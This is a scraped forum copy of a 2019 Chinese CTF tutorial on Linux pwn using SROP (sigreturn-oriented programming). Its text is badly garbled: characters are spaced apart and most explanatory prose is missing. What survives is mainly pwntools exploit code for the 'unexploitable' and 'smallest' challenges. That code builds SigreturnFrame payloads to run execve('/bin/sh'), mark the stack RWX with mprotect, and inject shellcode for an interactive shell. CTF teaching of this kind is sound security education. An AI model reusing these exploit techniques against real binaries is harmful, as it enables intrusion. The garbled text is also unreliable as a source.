搜索

[19522] 2019-08-27_CTF必备技能丨LinuxPwn入门教程——SROP

文档创建者:s7ckTeam
浏览次数:38
最后更新:2025-01-18
2019-08-27_CTF必备技能丨LinuxPwn入门教程——SROP C T F L i n u x   P w n S R O P i   2 0 1 9 - 0 8 - 2 7 L i n u x   P w n i P w n L i n u x   P w n i 3 8 6 / a m d 6 4 L i n u x   P w n P w n D o c k e r p y t h o n i L i n u x   P w n S R O P 1 0 0 1 S R O P R O P a m d 6 4 R O P g a d g e t s g a d g e t s R O P 使 S R O P R O P S R O P ( S i g r e t u r n   O r i e n t e d   P r o g r a m m i n g ) U n i x S i g n a l L i n u x 1 s i g n a l 2 ( ) r t _ s i g r e t u r n S i g n a l   H a n d l e r r t _ s i g r e t u r n
3 r t _ s i g r e t u r n 4 1 r t _ s i g r e t u r n 2 r t _ s i g r e t u r n r e _ s i g r e t u r n 1 2 3 4 r i p S i g r e t u r n   F r a m e S i g r e t u r n   F r a m e S R O P p w n t o o l s S i g r e t u r n F r a m e S R O P h t t p : / / d o c s . p w n t o o l s . c o m / e n / s t a b l e / r o p / s r o p . h t m l p w n t o o l s S i g r e t u r n F r a m e r t _ s i g r e t u r n r t _ s i g r e t u r n S i g r e t u r n F r a m e s y s c a l l r t _ s i g r e t u r n 3 2 i 3 8 6 3 2 i 3 8 6   o n   a m d 6 4 6 4 3 2 i 3 8 6 S i g n a l F r a m e c o n t e x t . a r c h   =   i 3 8 6 S R O P F r a m e   =   S i g r e t u r n F r a m e ( k e r n e l   =   i 3 8 6 )
a m d 6 4 3 2 S i g n a l F r a m e 0 2 S R O P 1 S R O P 使 p w n t o o l s S R O P S R O P ~ / p w n a b l e . k r - u n e x p l o i t a b l e / u n e x p l o i t a b l e g o t s y s t e m w r i t e p u t s l i b c 使 R O P g a d g e t s y s c a l l R O P g a d g e t s y s c a l l g a d g e t g a d g e t r o p p e r [ h t t p s : / / g i t h u b . c o m / s a s h s / R o p p e r ] r o p p e r s y s c a l l r s i r d i g a d g e t R O P g e t s h e l l r e a d 0 x 5 0 f 1 6 r i p S i g r e t u r n F r a m e 使 S R O P   g e t s h e l l g e t s h e l l   s y s _ e x e c v e e x e c v e ( / b i n / s h ,   0 ,   0 ) / b i n / s h x 0 0 s y s c a l l m o v   e d x ,   5 0 F h s y s c a l l x 0 0 c o n t e x t . a r c h = i 3 8 6 S R O P F r a m e   =   S i g r e t u r n F r a m e ( k e r n e l   =   a m d 6 4 )
S R O P r e a d r e a d / b i n / s h x 0 0 r s i g a d g e t r b p r a x ,   r s i r b p r e a d 1 2 3 4 0 x 6 0 1 1 5 c c a l l   _ r e a d l e a v e 0 x 6 0 1 1 7 4 r i p r e t n R O P / b i n / s h x 0 0 0 x 6 0 1 1 5 c 0 x 6 0 1 1 7 4 r t _ s i g r e t u r n S i g r e t u r n F r a m e S R O P s y s c a l l r a x = 0 x f r t _ s i g r e t u r n r e a d i 3 8 6 / a m d 6 4 e a x / r a x r e a d 1 5 r e t n s y s c a l l p a y l o a d s y s c a l l _ a d d r   =   0 x 4 0 0 5 6 0 s e t _ r e a d _ a d d r   =   0 x 4 0 0 5 5 b r e a d _ a d d r   =   0 x 4 0 0 5 7 1 f a k e _ s t a c k _ a d d r   =   0 x 6 0 1 1 6 c f a k e _ e b p _ a d d r   =   0 x 6 0 1 1 6 c b i n s h _ a d d r   =   0 x 6 0 1 1 5 c i o   =   r e m o t e ( ' 1 7 2 . 1 7 . 0 . 3 ' ,   1 0 0 0 1 ) p a y l o a d   =   " " p a y l o a d   + =   ' a ' * 1 6                               # p a d d i n g p a y l o a d   + =   p 6 4 ( f a k e _ s t a c k _ a d d r )   # l e a v e s t a c k   p i v o t 使 r b p 0 x 6 0 1 1 6 c ,   r b p + b u f 0 x 6 0 1 1 5 c p a y l o a d   + =   p 6 4 ( s e t _ r e a d _ a d d r )       # l e a   r a x ,   [ r b p + b u f ] ;   m o v   e d x ,   5 0 F h ;   m o v   r s i ,   r a x ;   m o v   e d i ,   0 ;   m o v   e a x ,   0 ;   c a l l   _ r e a d i o . s e n d ( p a y l o a d )
0 x 6 0 1 1 7 4 - 0 x 6 0 1 1 5 c = 0 x 1 8 ,   / b i n / s h x 0 0 8 p a d d i n g a * 0 x 1 0 a * 8 r e a d l e a v e r b p r e a d R B P / b i n / s h x 0 0 S i g r e t u r n F r a m e b s s c a l l   _ r e a d r s i r d i r d x p a y l o a d 1 5 / b i n / s h x 0 0 p a y l o a d 1 5 i o . s e n d ( ' / b i n / s h x 0 0 '   +   ( ' a ' ) * 7 )               # 1 5 0 x 6 0 1 1 5 c r e a d r a x = 0 x f f r a m e E x e c v e   =   S i g r e t u r n F r a m e ( )                             # S R O P   F r a m e f r a m e E x e c v e . r a x   =   c o n s t a n t s . S Y S _ e x e c v e f r a m e E x e c v e . r d i   =   b i n s h _ a d d r f r a m e E x e c v e . r s i   =   0 f r a m e E x e c v e . r d x   =   0 f r a m e E x e c v e . r i p   =   s y s c a l l _ a d d r p a y l o a d   =   " " p a y l o a d   + =   " / b i n / s h x 0 0 "                                 # b i n s h 0 x 6 0 1 1 5 c p a y l o a d   + =   ' a ' * 8                                                 # p a d d i n g p a y l o a d   + =   p 6 4 ( f a k e _ s t a c k _ a d d r + 0 x 1 0 )         # 0 x 6 0 1 1 6 c l e a v e r s p + 8 + 0 x 1 8 s y s c a l l p a y l o a d   + =   p 6 4 ( r e a d _ a d d r )                               # 0 x 6 0 1 1 7 4 r s i ,   r d i ,   r d x r e a d s e t   r a x 1 5 p a y l o a d   + =   p 6 4 ( f a k e _ e b p _ a d d r )                       # c a l l   r e a d l e a v e ,   r s p f a k e _ s t a c k _ a d d r + 0 x 1 0 + 8 ,   0 x 6 0 1 1 7 c p a y l o a d   + =   p 6 4 ( s y s c a l l _ a d d r )                         # 0 x 6 0 1 1 7 c + 8 0 x 6 0 1 1 8 4 s y s c a l l c a l l   r e a d 1 5 p a y l o a d   + =   s t r ( f r a m e E x e c v e )                           # S i g r e t u r n F r a m e
使 / b i n / s h x 0 0 p w n t o o l s + I D A r e t n s y s c a l l s y s c a l l r a x 0 x f F 8 R A X S i g r e t u r n F r a m e S R O P F 9 使 i o . i n t e r a c t i v e (   ) s h e l l 0 3 S R O P 2 使 S R O P S R O P ~ / 3 6 0 i c h u n q i u   2 0 1 7 - s m a l l e s t / s m a l l e s t S R O P e x e c v e ( / b i n / s h x 0 0 0 0 ) m p r o t e c t + s h e l l c o d e g e t s h e l l s h e l l c o d e B S S m p r o t e c t 使 S R O P r e t n s h e l l c o d e
s y s _ r e a d 1 r a x = 1 s y s _ w r i t e b u f m o v   r s p ,   r s i r s p s t a r t r e a d . r e a d 使 S R O P s y s _ r e a d p a y l o a d s y s c a l l _ a d d r   =   0 x 4 0 0 0 b e s t a r t _ a d d r   =   0 x 4 0 0 0 b 0 s e t _ r s i _ r d i _ a d d r   =   0 x 4 0 0 0 b 8 s h e l l c o d e   =   a s m ( s h e l l c r a f t . a m d 6 4 . l i n u x . s h ( ) ) i o   =   r e m o t e ( ' 1 7 2 . 1 7 . 0 . 3 ' ,   1 0 0 0 1 ) p a y l o a d   =   " " p a y l o a d   + =   p 6 4 ( s t a r t _ a d d r )                     # s t a r t s y s _ r e a d r a x   =   1 s y s _ w r i t e p a y l o a d   + =   p 6 4 ( s e t _ r s i _ r d i _ a d d r )         # m o v   r s i ,   r s p ;   m o v   r d i ,   r a x ;   s y s c a l l ;   r e t n s y s _ w r i t e ( 1 ,   r s p ,   s i z e ) p a y l o a d   + =   p 6 4 ( s t a r t _ a d d r )                     # s t a r t i o . s e n d ( p a y l o a d ) s l e e p ( 3 ) i o . s e n d ( p a y l o a d [ 8 : 8 + 1 ] )                           # s y s _ r e a d r a x   =   1 s t a c k _ a d d r   =   u 6 4 ( i o . r e c v ( ) [ 8 : 1 6 ] )   +   0 x 1 0 0       # l o g . i n f o ( ' s t a c k   a d d r   =   % # x '   % ( s t a c k _ a d d r ) ) f r a m e _ r e a d   =   S i g r e t u r n F r a m e ( )                       # r e a d S R O P f r a m e _ r e a d . r a x   =   c o n s t a n t s . S Y S _ r e a d f r a m e _ r e a d . r d i   =   0 f r a m e _ r e a d . r s i   =   s t a c k _ a d d r f r a m e _ r e a d . r d x   =   0 x 3 0 0 f r a m e _ r e a d . r s p   =   s t a c k _ a d d r                           # s t a c k _ a d d r s t a r t S R O P r e t s t a r t f r a m e _ r e a d . r i p   =   s y s c a l l _ a d d r
L i n u x   P w n f r a m e _ r e a d . r i p   =   s y s c a l l _ a d d r p a y l o a d   =   " " p a y l o a d   + =   p 6 4 ( s t a r t _ a d d r )                             # s t a r t s y s _ r e a d r a x   =   0 x f s y s _ s i g r e t u r n p a y l o a d   + =   p 6 4 ( s y s c a l l _ a d d r )                         # r e t s y s c a l l S R O P S R O P p a y l o a d   + =   s t r ( f r a m e _ r e a d ) i o . s e n d ( p a y l o a d ) s l e e p ( 3 )                 i o . s e n d ( p a y l o a d [ 8 : 8 + 1 5 ] )                                 # s y s _ r e a d r a x   =   0 x f p a y l o a d s l e e p ( 3 ) s y s c a l l r e t n r s p S R O P s y s _ r e a d s t a r t 使 S R O P s y s _ m p r o t e c t s h e l l c o d e R W X f r a m e _ m p r o t e c t   =   S i g r e t u r n F r a m e ( )               # m p r o t e c t S R O P m p r o t e c t R W X f r a m e _ m p r o t e c t . r a x   =   c o n s t a n t s . S Y S _ m p r o t e c t f r a m e _ m p r o t e c t . r d i   =   s t a c k _ a d d r   &   0 x F F F F F F F F F F F F F 0 0 0 f r a m e _ m p r o t e c t . r s i   =   0 x 1 0 0 0 f r a m e _ m p r o t e c t . r d x   =   c o n s t a n t s . P R O T _ R E A D   |   c o n s t a n t s . P R O T _ W R I T E   |   c o n s t a n t s . P R O T _ E X E C f r a m e _ m p r o t e c t . r s p   =   s t a c k _ a d d r f r a m e _ m p r o t e c t . r i p   =   s y s c a l l _ a d d r p a y l o a d   =   " " p a y l o a d   + =   p 6 4 ( s t a r t _ a d d r ) p a y l o a d   + =   p 6 4 ( s y s c a l l _ a d d r ) p a y l o a d   + =   s t r ( f r a m e _ m p r o t e c t ) i o . s e n d ( p a y l o a d ) s l e e p ( 3 ) i o . s e n d ( p a y l o a d [ 8 : 8 + 1 5 ] ) s l e e p ( 3 ) s t a r t 使 R O P s h e l l c o d e s h e l l c o d e p a y l o a d   =   " "                                                 p a y l o a d   + =   p 6 4 ( s t a c k _ a d d r + 0 x 1 0 )                   # r e t s t a c k _ a d d r + 0 x 1 0 s h e l l c o d e p a y l o a d   + =   a s m ( s h e l l c r a f t . a m d 6 4 . l i n u x . s h ( ) ) i o . s e n d ( p a y l o a d ) s l e e p ( 3 ) i o . i n t e r a c t i v e ( )
  i       S h e l l C o d e   R O P     l i b c     P I E b y p a s s
/ C T F ? / W e b E n d i 沿
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理